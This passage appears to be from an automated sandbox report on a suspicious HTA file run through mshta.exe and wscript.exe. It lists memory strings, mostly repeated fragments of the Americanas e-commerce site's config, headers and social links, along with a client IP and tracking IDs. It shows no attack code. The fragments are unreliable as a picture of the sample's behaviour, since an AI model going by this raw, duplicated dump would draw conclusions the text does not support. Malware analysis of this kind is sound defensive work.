a-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: g>~>&https://www.facebook.com/americanascom equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: h,https://www.youtube.com/user/CanalAmericanas equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.0000000004422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanas equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.540707630.0000000004422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537996386.0000000004420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanas[ equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/CanalAmericanasn equals www.youtube.com (Youtube)
Source: gtm[1].js.0.drString found in binary or memory: return b}VD.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.536183234.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tps://www.youtube.com/user/CanalAmericanasa equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ttps://www.youtube.com/CanalAmericanasn equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.coml equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.540237396.000000000077B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.518135358.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.353729199.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541246958.0000000005E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.facebook.com (Facebook)
